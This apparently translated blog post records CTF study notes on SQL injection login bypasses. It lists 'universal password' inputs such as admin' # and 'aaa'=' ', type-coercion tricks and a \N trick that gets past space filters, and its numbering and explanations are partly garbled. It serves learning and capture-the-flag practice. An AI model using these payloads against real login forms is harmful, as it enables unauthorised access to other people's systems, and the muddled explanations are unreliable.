CTF SQL universal password

Time:2020-10-1

The following are some of my feelings when learning SQL injection. I hope it can help you. If you have any mistakes, please point out.

 

Types of universal password:

①select * from admin where username =”” and password = “”

②admin’ #

③’+’   ‘+’

④0

⑤Aaa’ = ‘

 

In the following select statement, the user name and password can be treated similarly as string variables

select * from user where username = ‘admin’ and password = ‘yi’;

What is the judgment logic of the statement?

It means that the execution is successful when the username =’admin ‘and password:’ Yi ‘are both true.

That is to say, no matter what, as long as these two items are trueThis means that even if the user name and password are not correct, if both are true, the execution will succeed,This logic is the injection principle of (2) and (3)

①select * from user where username = ‘chen’ # ‘ and password = ‘qian’;

select * from user where username = ' '+' ' and password = ' '+' ';(limited)

select ‘ ‘+’ ‘;

select ‘qian’=0;

select ‘1qian’=0;

Only valid for strings with non numeric values for username and password. Eg:’q123′

In this case, the user name and password in the select statement can be regarded as string variables, so the variable equal to the string at the beginning of a number will be 0 when it is converted to the form of int (here, the = sign is not an assignment symbol, it is the function of the = sign in Mathematics)

③select * from user where username = 0 and password = 0; 

Here, user name and password can be regarded as string variables, so the string that does not begin with a number will be 0 when it is converted into int form (the principle is the same as that of ③, but the expression method is different)

④select * from user where username = ‘aaa’=’ ‘ and password = ‘aaa’=’ ‘; 

select 'aaa'='a';(execution result is 0)

select ‘aaa’=’a’=’ ‘; 

Judgment logic: if the user name’aaa ‘is false, false =’ ‘becomes true, and the password is the same (provided that neither username nor password is’ AAA’)% E6% B5% 85% E6% 98% 93% E6% B7% B1

select \Nfrom user;(successful execution, no space between N and from)

select 1from;(execution failed because there is no space between 1 and from)

select 1,2,\Nfrom user;(successful execution, no space between 2 and from)

When the left end of from cannot enter a space, you can consider whether this method can be used to bypass.